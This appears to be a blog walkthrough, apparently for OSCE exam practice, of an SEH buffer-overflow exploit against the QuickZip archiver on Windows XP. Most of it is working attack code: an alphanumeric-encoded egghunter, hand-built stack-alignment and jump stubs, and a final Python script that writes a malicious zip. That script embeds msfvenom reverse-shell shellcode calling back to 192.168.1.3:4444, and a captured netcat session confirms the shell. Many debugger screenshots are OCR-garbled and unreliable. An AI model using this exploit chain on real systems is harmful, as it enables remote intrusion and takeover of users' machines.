0012FBFC 0012FBFE 0012FCØØ 0012FCØ2 0012FCØ3 BYTE DS: 0012FCØ6 0012FCØ8 0012FCØ9 0012FCØQ 0012FCØC 83 3328 42 0040 FC 1200 50 1200 CD E? JNO SHORT 0012FB81 SHORT 0012FB83 EBP*DWORD PIR DS: QDD PUSH CLD PIR PIR

After the JMP

0012FB81 0012FB82 0012FB83 0012FB84 0012FB85 0012FB86 0012FB8? 0012FB88 0012FB89 0012FB8Q 0012FB8B 41 41 41 41 41 41 41 41 41 41 41 INC INC INC INC INC INC INC INC INC INC INC ntdll. '?C90

Address Difference: 0012FBFC – 0012FB81 = 7B (123 in decimal) Not 125 since we use 2 bytes with JNO
To make a checksum, divide offset as “A”*171 + “B”*123 and after JNO, we will jump into the beginning of B’s

File View Debug Plugins ImmLib Options Window INC INC INC INC INC INC INC INC INC INC INC INC INC Help -lobs w h C root@kalisa: Ihome/kalisa/OSCE/vuln-apps/quickzi P offset — 0012FB?B 0012FB?C 0012FB?D 0012FB?E 0012FB?F 0012FB8Ø 0012FB81 0012FB82 0012FB83 0012FB84 0012FB85 0012FB86 0012FB8? 41 41 41 41 41 41 42 42 42 42 42 42 42 nseh = seh = junk = xgf" (4064-2B4-4-4) #00422833 payload = "A" *171 + 123 + nseh + seh + junk payload += " . txt" exploit myfile = header 1 + payload + header 2 + payload open(ltry. z 1 pl,

Let’s check if Junk is still in memoryclick m and search for DDDDDDDDDDDDDDD

S e c t io n CO n t in S Type Access Ⅰ n it ial Mapped as 128 0 1B4 Enter binary string to search for \Deu ice\HarddiskUo lume1\WI NDO \Deu ice\HarddiskUo lume1\WI NDO AS 囗 | DDDDDDDDDDDDDDDDDDDI 1 \ NDO 1 \ NDO 凵 N ICO 〔 〕 E on a 〔 〔 on H ㄑ + 1 3 1 \ NDO op Entire block 1 Cancel Case Message file(s) not found QuickZip QuickZip CODE QuickZip DQ T Q QuickZip BSS QuickZip . idata QuickZip . t Is QuickZip . rdata I g QuickZip . 10 C 10 C at n S Ⅰ g R QuickZip Ⅰ g R · PSYC S 0 e S p R E p R E p R p R E RW RW R

So we can still place our shellcode in memory

Egghunter – Encrypted

!mona egghuntersave it in egghunter.txtcat egghunter.txt | tr -d ‘”‘ | tr -d ‘\n’ | tr -d ‘\\x’ | xxd -r -p > egghunter.binmsfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 –platform Windows

root.ßkalisa. # hunt r . i n root.ßkalisa. fferRegister=EDX —a x 日 —platform Tdindows Found 1 compatible nc 口 〔 rs Attempting to nc 口 〔 payload With 1 iterations 口 cat egghunter.txt | —d —p x86/alpha mixed | tr —d 、 n | tr —d 、 、 x | xxd —r —p > egg PAYLOADFILE=egghunter.hin - x86/alpha mixed Bu x86/alpha mixed cc 〔 〔 Uith size 117 (iteration=Ü) x86/alpha mixed chosen Uith final size 117 Payload size: 117 hytes
encoded_egghunter= “JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”
offset = “A”*27 + encoded_egghunter + “A”*27           # total of 171offset += “B”*123                         # total offset = 171 + 123 = 294 294nseh = “B”*4seh = “\x33\x28\x42\x00”      # pop pop ret 00422833junk = “D”* (4064-298-4)

payload = offset + nseh + seh + junkpayload += “.txt”

In the end, the payload will look like the following:”A”*n + egghunter + “JMP[egghunter]” + POPPOPRET + [Egg + Shellcode]

Get to the Egghunter Payload

Now we’ll use the remaining 123 bytes to get to our egghunter
Plan: Zero out EAXCalculate the value of the address of our shellcode, in little-endian orderPush the address in EAX onto the stackPop the value into EDXZero out EAX (not strictly necessary, but easier math)Push ESP onto the stackPop the value into EAXAdjust the stack address to point to an address below our decoder so that once we’ve decoded it, we automatically execute itPush EAX onto the stackPop the value into ESP, making it so if we push a value, we’ll be writing below our current executionPush JMP EDX instruction
Opcodes that we need – nasm_shellThe address of our shellcode in memoryPOP EDX opcode = \x5APUSH ESP opcode = \x54POP EAX opcode = \x58PUSH EAX opcode = \x50POP ESP opcode = \x5CJMP EDX opcode = \xFF\xE2
nasm_shell.rb

root.ßkalisa. # /usr/share/metasploit—frarnework/tools/exploit/nasm she 11 . rh 〉 POP edx nasm 口口口口口口口口 5 A 〉 push esp nasm 口口口口口口口口 5 〉 POP eax nasm 口口口口口口口口 5B 〉 push eax nasm 口口口口口口口口 5口 〉 POP esp nasm 口口口口口口口口 5 C 〉 jmp edx nasm 口口口口口口口口 FFEZ POP edx push esp POP eax push eax POP esp edx

The address of egghunter:
The beginning of our egghunter between “A”‘s is as below (0012FAF1). But it’s not divisible by 4 so we’ll start it one byte above with the following:”A”*26 + egghunter + “A”*28

0012FQEQ 0012FQEB 0012FQEC 0012FQED 0012FQEE 0012FQEF 0012FQFØ 0012FQF1 0012FQF2 0012FQF3 0012FQF4 0012FQF5 0012FQF6 0012FQF? 41 41 41 41 41 41 41 INC INC INC INC INC INC INC DEC DEC DEC DEC DEC DEC DEC

Now our egghunter starts at 0012FAF0

0012PAEC ββ12ΡΑΡ1 41 41 41 41 41 41 41 INC INC INC INC INC INC INC DEC DEC DEC DEC ΕΙΜ ΕΙΜ ΕΙΜ ΕΙΜ

The address of our shellcode in memory = 0012FAF0POP EDX opcode = \x5APUSH ESP opcode = \x54POP EAX opcode = \x58PUSH EAX opcode = \x50POP ESP opcode = \x5CJMP EDX opcode = \xFF\xE2
Zero out EAX (using AND EAX)
AND EAX = \x25

%JMNU : \x25\x4a\x4d\x4e\x55 : AND EAX,0x554E4D4A %521* : \x25\x35\x32\x31\x2a : AND EAX,0x2A313235
Binary of hex numbers:0x554E4D4A = 1010101010011100100110101001010 0x2A313235 = 0101010001100010011001000110101
XOR’ing them gives us 0

Encoding a Value:

Shellcode Address = 0012FAF0Little endian format: \xF0\xFA\x12\x00Compliment: \x00\x12\xFA\xF0
hexOfDecimal(4294967296-decimalOfHex(0012FAF0)) = FFED0510
decimalOfHex: 0012FAF0 = 12438884294967296 – 1243888 = 42937234084293723408 in hex is FFED0510

Zero out EAX + PUSH EAX + POP EDX
!mona encode -t alphanum -s ‘\xF0\xFA\x12\x00’

Results:——–  %JMNU : \x25\x4a\x4d\x4e\x55 : AND EAX,0x554E4D4A  %521* : \x25\x35\x32\x31\x2a : AND EAX,0x2A313235  -ZVNU : \x2d\x5a\x56\x4e\x55 : SUB EAX,0x554e565a  -ZVNU : \x2d\x5a\x56\x4e\x55 : SUB EAX,0x554e565a  -\XPU : \x2d\x5c\x58\x50\x55 : SUB EAX,0x5550585c  P : \x50 : PUSH EAX
Full encoded string:——————–%JMNU%521*-ZVNU-ZVNU-\XPUP
Full encoded hex:—————–\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5a\x56\x4e\x55\x2d\x5a\x56\x4e\x55\x2d\x5c\x58\x50\x55\x50
# 27 bytesshellcode_to_edx = (  “\x25\x4a\x4d\x4e\x55”        # AND EAX,0x554E4D4A  “\x25\x35\x32\x31\x2a”        # AND EAX,0x2A313235  “\x2d\x5a\x56\x4e\x55”        # SUB EAX,0x554e565a  “\x2d\x5a\x56\x4e\x55”        # SUB EAX,0x554e565a  “\x2d\x5c\x58\x50\x55”        # SUB EAX,0x5550585c  “\x50”                                        # PUSH EAX  “\x5A”                                       # POP EDX)

So we use 27 bytes to get our shellcode location into EDX

0012FB81 0012FB82 0012FB83 0012FB84 0012FB85 0012FB8Q 0012FB8F 0012FB94 0012FB99 0012FB9E 0012FB9F 0012FBQØ 0012FBQ1 0012FBQ2 42 42 42 42 25 25 50 59 43 43 43 494D4E55 35323129 59564E55 59564E55 5C585055 INC INC INC INC AND AND SUB SUB SUB PUSH POP INC INC INC ntdll. '?C90 Registers (3DNow! ) 554E4D4Q 29313235 EQ*554E565Q EQ*554E565Q EQ*5550585c ESP EBP ESI EDI EIP PI ooøøøøøø 713903298 ?C9Ø32BC ooøøøøøø 0012F5CØ 0012F698 ooøøøøøø ooøøøøøø 0012FB81 ES 0023 CS 001B SS 9023 ntdll. ntdll. 32bit 32bit 32bit 713903298 ?C9Ø32BC O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF)

Decode Stack Alignment

The place to align the stack to and decode our JMP EDX to (need to be a multiple of four)sub eax = \x2d

0012FBF3 0012FBF4 0012FBF5 0012FBF6 0012FBF? 0012FBF8 0012FBF9 0012FBFQ 0012FBFB 0012FBFC 42 42 42 42 42 42 42 42 42 71 83 INC INC INC INC INC INC INC INC INC JNO Registers (MM* ) SHORT 0012FB81 ESP EBP ESI EDI EIP ooøøøøøø 713903298 ntd11.?C9Ø32Q8 ?C9Ø32BC ntd11.?C9Ø32BC ooøøøøøø 0012F5CØ 0012F698 ooøøøøøø ooøøøøøø 0012FB81

Place for it: 0012FBF8ESP: 0012F5C0
0012F5C0 (ESP) – 0012FBF8 (Target) = FFFFF9C8
FFFFF9C8/3 = 5555534255 55 53 42 55 55 53 4255 55 53 44

# 19 bytesdecode_stack_alignment = (    “\x54”                 # PUSH ESP    “\x58”                 # POP EAX    “\x2d\x42\x53\x55\x55”  # SUB EAX, 0x55555342    “\x2d\x42\x53\x55\x55”  # SUB EAX, 0x55555342    “\x2d\x44\x53\x55\x55”  # SUB EAX, 0x55555344    “\x50”                  # PUSH EAX    “\x5c”                  # POP ESP)

EAX is full of egghunter

0012FB82 0012FB83 0012FB84 0012FB85 0012FB8Q 0012FB8F 0012FB94 0012FB99 0012FB9E 0012FB9F 0012FBQØ 0012FBQ1 0012FBQ2 0012FBQ? 42 42 42 25 25 50 59 54 58 494D4E55 35323129 59564E55 59564E55 5C585055 42535555 42535555 INC INC INC AND AND SUB SUB SUB PUSH POP PUSH POP Registers (FPO) 554E4D4Q 29313235 EQ*554E565Q EQ*554E565Q EQ*5550585c ESP EBP ESI EDI EIP 0012FQFØ 713903298 ?C9032C0 ooøøøøøø 0012F5CØ 0012F698 ooøøøøøø ooøøøøøø 0012FB9E ES 0023 CS 001B SS 9023 ntdll. ntdll. 32bit 32bit 32bit 713903298 ?C9032C0 O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF)

After POP EDX, now EDX is filled with egghunter

0012FB82 0012FB83 0012FB84 0012FB85 0012FB8Q 0012FB8F 0012FB94 0012FB99 0012FB9E 0012FB9F 0012FBQØ 0012FBQ1 0012FBQ2 42 42 42 25 25 50 59 54 58 494D4E55 35323129 59564E55 59564E55 5C585055 42535555 INC INC INC AND AND SUB SUB SUB PUSH POP PUSH POP Registers (FPO) 554E4D4Q 29313235 EQ*554E565Q EQ*554E565Q EQ*5550585c ESP EBP ESI EDI EIP PI 0012FQFØ 713903298 ntd11.?C9Ø32Q8 0012FQFØ ooøøøøøø 0012F5CØ 0012F698 ooøøøøøø ooøøøøøø 0012FBQØ ES 0023 32bit O<FFFFFFFF) CS 001B 32bit O<FFFFFFFF)

After POP EAX, it doesn’t hold egghunter anymore

0012FB82 0012FB83 0012FB84 0012FB85 0012FB8Q 0012FB8F 0012FB94 0012FB99 0012FB9E 0012FB9F 0012FBQØ 0012FBQ1 0012FBQ2 42 42 42 25 25 50 59 54 58 494D4E55 35323129 59564E55 59564E55 5C585055 42535555 INC INC INC AND AND SUB SUB SUB PUSH POP PUSH POP Registers (FPO) 554E4D4Q 29313235 EQ*554E565Q EQ*554E565Q EQ*5550585c ESP EBP ESI EDI EIP PI 0012F5CØ 713903298 0012FQFØ ooøøøøøø 0012F5CØ 0012F698 ooøøøøøø ooøøøøøø 0012FBQ2 ES 0023 CS 001B ntdll. 32bit 32bit 713903298 O<FFFFFFFF) O<FFFFFFFF)

After POP ESP, ESP holds the address 0012FBF8 which we want to go

0012FB82 0012FB83 0012FB84 0012FB85 0012FB8Q 0012FB8F 0012FB94 0012FB99 0012FB9E 0012FB9F 0012FBQØ 0012FBQ1 0012FBQ2 0012FBQ? 0012FBQC 0012FBB1 0012FBB2 0012FBB3 0012FBB4 0012FBB5 42 42 42 25 25 50 59 54 58 50 43 43 43 494D4E55 35323129 59564E55 59564E55 5C585055 42535555 42535555 44535555 INC INC INC AND AND SUB SUB SUB PUSH POP PUSH POP PUSH POP INC INC INC Registers (FPO) 554E4D4Q 29313235 EQ*554E565Q EQ*554E565Q EQ*5550585c ESP EBP ESI EDI EIP 0012FBF8 713903298 0012FQFØ ooøøøøøø 0012FBF8 0012F698 ooøøøøøø ooøøøøøø 0012FBB3 ES 0023 CS 001B SS 0023 23 3B ntdll. 32bit 32bit 32bit 32bit 32bit NULL 713903298 O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) ESP Progress Progress Log Close ERROR_FI _FOUND (00000002 ) 02

And our payload looks like following overall

encoded_egghunter=”JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”
offset = “A”*26 + encoded_egghunter + “A”*28           # total of 171offset += “B”*4 + shellcode_to_edx + decode_stack_alignmentoffset += “B”*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment))                        nseh = “\x71\x9f\x70\x9f”seh = “\x33\x28\x42\x00”      # pop pop ret 00422833junk = “D”* (4064-298-4)
payload = offset + nseh + seh + junkpayload += “.txt”

Encode JMP EDX

!mona encode -t alphanum -s ‘\x90\x90\xFF\xE2’

Results:——–  %JMNU : \x25\x4a\x4d\x4e\x55 : AND EAX,0x554E4D4A  %521* : \x25\x35\x32\x31\x2a : AND EAX,0x2A313235  -%%U^ : \x2d\x25\x25\x55\x5e : SUB EAX,0x5e552525  -%%U^ : \x2d\x25\x25\x55\x5e : SUB EAX,0x5e552525  -&%V` : \x2d\x26\x25\x56\x60 : SUB EAX,0x60562526  P : \x50 : PUSH EAX
Full encoded string:——————–%JMNU%521*-%%U^-%%U^-&%V`P
Full encoded hex:—————–\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x25\x55\x5e\x2d\x25\x25\x55\x5e\x2d\x26\x25\x56\x60\x50
OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD [+] Command used: ! mona encode —t alphanum —s ' [+] Using alphanum encoder [+] Received 4 bytes to encode [+] NY of bad chars: 0 [+] Processing block 1/1 OX77f10000 OX73dCOOOO Ox6d7eOOOO Ox77920000 OX7e410000 OX77120000 Results: %-IMNU . 36521 u ox77f5gooo ox73dcgooo ox6d7f2000 OX77a13000 Ox7e4a1000 Ox771abOOO OX00003000 OX00012000 OXOOOf3000 Ox00091000 OXOOOBbOOO T rue T rue T rue T rue EA.x, Ox554E404A. EA.x, OX2A313235 EA.x, OX5e552525 EA.x, OX5e552525 EA.x, OX60562526 5.1. 2600. 6460 CG0132.c 5.1. 5.1. 2600.0 C030XOF.OLL 5.1. 2600. 5603 C SETUPAF 5.1. 2600. 5512 Cuser32. 6341 Col eaut3 5.1. 2600. Opcode to produce reversed 2' s complement • 90 90 60 56 90 25 90 26 5\x4 a\x4 d\x4 ex x 5 5 . PUSH EAX . AND AND sua sua sua Preparing output file (Re)setting logf ile ' encoded_alphanum . txt ' encoded_alphanum . txt Generating module info table. hang on. Processing modules Done. Let's rock 'n roll. Results : zJMNU : PUSH Full encoded string: Full encoded string: Full encoded hex: 5\x4 a\x4 d\x4 5 5\x2 d\x2 5\x2 5 5 d\x2 5\x2 5 5 d\x2 5 5 0 . AND AND SUB SUB SUB This mona. action took Ox554E4D4Q 5<29313235 Ox5e552525 Ox5e552525 5<60562526 515000 !mona encode -t alphanum

Overall exploit:

encoded_egghunter=”JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”
# 27 bytesshellcode_to_edx = (  “\x25\x4a\x4d\x4e\x55”        # AND EAX,0x554E4D4A  “\x25\x35\x32\x31\x2a”        # AND EAX,0x2A313235  “\x2d\x5a\x56\x4e\x55”        # SUB EAX,0x554e565a  “\x2d\x5a\x56\x4e\x55”        # SUB EAX,0x554e565a  “\x2d\x5c\x58\x50\x55”        # SUB EAX,0x5550585c  “\x50”                                        # PUSH EAX  “\x5A”                                       # POP EDX)
# 19 bytesdecode_stack_alignment = (    “\x54”                 # PUSH ESP    “\x58”                 # POP EAX    “\x2d\x42\x53\x55\x55”  # SUB EAX, 0x55555342    “\x2d\x42\x53\x55\x55”  # SUB EAX, 0x55555342    “\x2d\x44\x53\x55\x55”  # SUB EAX, 0x55555344    “\x50”                  # PUSH EAX    “\x5c”                  # POP ESP)
# 26 bytesencoded_jmp_edx = (  “\x25\x4a\x4d\x4e\x55”  # AND EAX,0x554E4D4A  “\x25\x35\x32\x31\x2a”  # AND EAX,0x2A313235  “\x2d\x25\x25\x55\x5e”  # SUB EAX,0x5e552525  “\x2d\x25\x25\x55\x5e”  # SUB EAX,0x5e552525  “\x2d\x26\x25\x56\x60”  # SUB EAX,0x60562526  “\x50”  # PUSH EAX)
# will be total of 294offset = “A”*26 + encoded_egghunter + “A”*28           # total of 171offset += “B”*4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edxoffset += “C”*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx))                        
nseh = “\x71\x9f\x70\x9f”seh = “\x33\x28\x42\x00”      # pop pop ret 00422833
junk = “D”* (4064-298-4)
payload = offset + nseh + seh + junkpayload += “.txt”

Final Exploit and Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=4444 -e x86/alpha_mixed -a x86 –platform windows -f python -v shellcode

re assessment specialist needed Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode Le I Icode rghunter oot@kalisa: [1B2.16B. 1. 600 . : $. 7B, 134 home/kalisa/OSCE/vuln-a sl uickzi x6f\ x5B x6f\ x55 x66 x3 x55\ x51 x3 x56 x51\ x51\ x46 x3 x6f Progress Progress Log x7a\ x35\ x6d\ x6d\ \ x 62 \ x4f\ x 6.3b Message . file(s) not found "JJJJJJJJJJJJJJJJJQRY Close tdll. KiFastSystemCa11Ret SCI 1 "cmd" tdll. KiFastSystemCa11Ret 2bit O<FFFFFFFF) 2bit O<FFFFFFFF) 2bit O<FFFFFFFF) 2bit O<FFFFFFFF) 2bit ULL RROR_SUCCESS root@kalisa: root.ßkal isa: listening on root.ßkal isa: listening on # nc [ any] # nc [ any] —n I vp 4444 4444 . —n I vp 4444 4444 . connect. to [1B2.16a.1.3] from Microsoft Tdindows XP [Version 5. 1.2600] (C) Copyright IBB5—2001 Microsoft Corp. 4] 1252 C : DOCUMENI\ ADMINI-I\ LOCALS-I \ Temp\ QZTEMP> x55\ x35\ x3 1 \ x5a\ x56\ x55\ x5a\ x. Ell code to edx = x55\ x5c\ x55\ x5A :code stack aligmnent. x5c x55\ x55\ x55\ x55\ x53\ x55' x55\ x35\ x3 x55\ coded jmp edx = + egghunter + 4 + shell code to edx + decode stack aligmnent. + encoded jmp edx (shell code to edx) (decode stack aligmnent.) (encoded -imp edx) E68 E68 E68 198 CE8 F68 020 001 198 ..J. QuickZip.ØØ4QØØØØ . N. QuickZip.ØØ4EØØØØ :eh = xgf !mona encode -t alphanum -s Too long (recurs iue?) SEH chain Runn ing
#!/usr/bin/python
header_1 = (“\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00”)
header_2 = (“\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00″”\x24\x00\x00\x00\x00\x00\x00\x00”)
header_3 = (“\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00″”\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00”)
# 710 bytesshellcode =  “w00tw00t”shellcode += “\x89\xe1\xdb\xda\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49″shellcode += “\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51″shellcode += “\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32″shellcode += “\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41″shellcode += “\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x4f\x72\x57\x70\x35\x50″shellcode += “\x77\x70\x65\x30\x4f\x79\x69\x75\x64\x71\x6b\x70\x50\x64″shellcode += “\x4e\x6b\x36\x30\x30\x30\x4e\x6b\x70\x52\x34\x4c\x6c\x4b”shellcode += “\x72\x72\x76\x74\x6e\x6b\x62\x52\x37\x58\x44\x4f\x6d\x67″shellcode += “\x50\x4a\x66\x46\x75\x61\x4b\x4f\x6c\x6c\x77\x4c\x71\x71″shellcode += “\x31\x6c\x77\x72\x44\x6c\x57\x50\x6b\x71\x7a\x6f\x64\x4d”shellcode += “\x57\x71\x48\x47\x7a\x42\x4c\x32\x52\x72\x46\x37\x6e\x6b”shellcode += “\x43\x62\x34\x50\x4e\x6b\x32\x6a\x77\x4c\x4e\x6b\x32\x6c”shellcode += “\x67\x61\x31\x68\x48\x63\x53\x78\x37\x71\x6e\x31\x43\x61″shellcode += “\x6c\x4b\x53\x69\x35\x70\x66\x61\x4a\x73\x4e\x6b\x50\x49″shellcode += “\x37\x68\x7a\x43\x35\x6a\x47\x39\x4e\x6b\x46\x54\x6c\x4b”shellcode += “\x56\x61\x48\x56\x30\x31\x79\x6f\x6c\x6c\x79\x51\x38\x4f”shellcode += “\x74\x4d\x53\x31\x5a\x67\x70\x38\x79\x70\x71\x65\x39\x66″shellcode += “\x34\x43\x51\x6d\x4b\x48\x77\x4b\x51\x6d\x45\x74\x64\x35″shellcode += “\x59\x74\x70\x58\x4e\x6b\x53\x68\x75\x74\x36\x61\x68\x53″shellcode += “\x33\x56\x6e\x6b\x74\x4c\x30\x4b\x6e\x6b\x63\x68\x67\x6c”shellcode += “\x57\x71\x5a\x73\x4c\x4b\x34\x44\x6c\x4b\x53\x31\x58\x50″shellcode += “\x6e\x69\x63\x74\x66\x44\x44\x64\x63\x6b\x31\x4b\x61\x71″shellcode += “\x70\x59\x51\x4a\x56\x31\x39\x6f\x6d\x30\x51\x4f\x31\x4f”shellcode += “\x51\x4a\x6c\x4b\x32\x32\x7a\x4b\x6e\x6d\x73\x6d\x42\x48″shellcode += “\x30\x33\x67\x42\x53\x30\x75\x50\x55\x38\x31\x67\x32\x53″shellcode += “\x76\x52\x51\x4f\x73\x64\x73\x58\x52\x6c\x50\x77\x47\x56″shellcode += “\x53\x37\x4b\x4f\x4b\x65\x68\x38\x6e\x70\x36\x61\x73\x30″shellcode += “\x77\x70\x31\x39\x6a\x64\x43\x64\x50\x50\x33\x58\x76\x49″shellcode += “\x4b\x30\x72\x4b\x55\x50\x59\x6f\x48\x55\x76\x30\x36\x30″shellcode += “\x52\x70\x32\x70\x73\x70\x52\x70\x37\x30\x62\x70\x72\x48″shellcode += “\x78\x6a\x54\x4f\x59\x4f\x4b\x50\x4b\x4f\x69\x45\x4c\x57″shellcode += “\x31\x7a\x44\x45\x50\x68\x79\x50\x4d\x78\x67\x71\x32\x31″shellcode += “\x55\x38\x67\x72\x47\x70\x64\x51\x61\x4c\x6c\x49\x68\x66″shellcode += “\x30\x6a\x36\x70\x42\x76\x73\x67\x55\x38\x4c\x59\x6c\x65″shellcode += “\x51\x64\x53\x51\x79\x6f\x6b\x65\x4f\x75\x6b\x70\x50\x74″shellcode += “\x74\x4c\x69\x6f\x70\x4e\x56\x68\x74\x35\x68\x6c\x73\x58″shellcode += “\x38\x70\x78\x35\x59\x32\x30\x56\x6b\x4f\x4e\x35\x31\x78″shellcode += “\x63\x53\x50\x6d\x70\x64\x35\x50\x4f\x79\x7a\x43\x72\x77″shellcode += “\x71\x47\x42\x77\x70\x31\x78\x76\x33\x5a\x77\x62\x52\x79″shellcode += “\x31\x46\x49\x72\x39\x6d\x63\x56\x6f\x37\x47\x34\x37\x54″shellcode += “\x57\x4c\x57\x71\x45\x51\x6c\x4d\x31\x54\x46\x44\x64\x50″shellcode += “\x7a\x66\x73\x30\x33\x74\x66\x34\x32\x70\x62\x76\x66\x36″shellcode += “\x30\x56\x53\x76\x62\x76\x30\x4e\x42\x76\x63\x66\x71\x43″shellcode += “\x53\x66\x55\x38\x70\x79\x5a\x6c\x67\x4f\x6b\x36\x59\x6f”shellcode += “\x78\x55\x6b\x39\x39\x70\x30\x4e\x61\x46\x52\x66\x39\x6f”shellcode += “\x70\x30\x32\x48\x74\x48\x6d\x57\x65\x4d\x53\x50\x69\x6f”shellcode += “\x4b\x65\x4d\x6b\x4c\x30\x78\x35\x39\x32\x52\x76\x63\x58″shellcode += “\x4e\x46\x4f\x65\x6d\x6d\x6d\x4d\x6b\x4f\x38\x55\x45\x6c”shellcode += “\x57\x76\x53\x4c\x77\x7a\x6b\x30\x4b\x4b\x79\x70\x54\x35″shellcode += “\x67\x75\x4f\x4b\x50\x47\x74\x53\x30\x72\x62\x4f\x50\x6a”shellcode += “\x67\x70\x72\x73\x6b\x4f\x59\x45\x41\x41”
# 117 bytes#egghunter = (“JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA”)
egghunter = (“JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FmQIZYoFoPB0Rpj321HhMfNUl4ERzbTzOOHPwp0FPCDLK8zlo3ExjloBUIwYom7AA”)
# 27 bytesshellcode_to_edx = (“\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5a\x56\x4e\x55\x2d\x5a\x56\x4e\x55\x2d\x5c\x58\x50\x55\x50\x5A”)
# 19 bytesdecode_stack_alignment = (“\x54\x58\x2d\x42\x53\x55\x55\x2d\x42\x53\x55\x55\x2d\x44\x53\x55\x55\x50\x5c”)        
# 26 bytesencoded_jmp_edx = (“\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x25\x55\x5e\x2d\x25\x25\x55\x5e\x2d\x26\x25\x56\x60\x50”)
# 171 – 117 = 54/2 = 27offset = “A”*26 + egghunter + “A”*28offset += “B” * 4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edxoffset += “C”*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx))nseh = “\x71\x9f\x70\x9f” seh = “\x33\x28\x42\x00”     #00422833
junk = “D”* 4 + shellcode+ “D”* (4064-294-4-4-4-len(shellcode))payload = offset + nseh + seh + junkpayload += “.txt”
exploit = header_1 + payload + header_2 + payload + header_3
myfile = open(‘try.zip’,’w’);myfile.write(exploit);myfile.close()

Explanation

|  Encoded shellcode  |  0012FAF0     |                     |       |                     |  |                     | |  A buffer start     |  0012FB63         |                     |       |                     |          |   jmp here (seh)    |  0012FB81        |                     |           |   shellcode_to_edx  |  0012FB85 (edx=12faf0 holds shellcode)      |                     |            |   stack align       |  0012FBA0 (esp = 12FBF8)        |                     |           |   jmp_edx           |  0012FBB3 (esp = 12FBF4)       |                     |           |                     |          |   B buffer start    |  0012FBCD        |                     |            |                     |           |                     |             |                     |       |                     |     |   JMP EDX           |  0012FBF6   (jump to 0012FAF0)     |                     |      |                     |               |   A buffer ends     |  0012FBFB        |   JMP back (nseh)   |  0012FBFC
Encoded shellcode A buffer start jmp here (seh) shellcode to edx stack align 0012FAFO 0012863 0012881 0012F885 (edx=12faf0 holds shellcode) 0012F8AO (esp 12F8F8) 0012883 (esp 12F8F4) jmp_edx 8 buffer EDX A buffer JMP back start ends (nseh) 0012F8CD 0012F8F6 0012F8F8 0012F8FC (jump to 0012FAFO)

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.